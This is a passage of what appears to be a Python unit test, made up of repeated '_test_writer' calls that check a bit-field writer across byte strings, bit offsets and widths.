_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 32, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 31, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 30, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 29, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 28, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 27, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 26, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 25, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 24, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 23, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 22, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 21, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 20, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 19, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 18, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 17, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 32, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 31, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 30, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 29, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 28, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 27, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 26, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 25, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 24, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 23, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 22, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 21, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 20, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 19, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 18, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 17, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 32, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 31, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 30, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 29, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 28, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 27, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 26, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 25, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 24, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 23, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 22, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 21, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 20, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 19, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 18, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 17, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 32, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 31, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 30, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 29, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 28, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 27, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 26, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 25, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 24, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 23, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 22, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 21, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 20, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 19, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 18, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 17, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 32, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 31, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 30, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 29, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 28, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 27, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 26, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 25, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 24, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 23, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 22, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 21, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 20, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 19, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 18, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 17, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 32, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 31, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 30, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 29, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 28, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 27, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 26, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 25, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 24, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 23, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 22, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 21, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 20, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 19, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 18, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 17, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
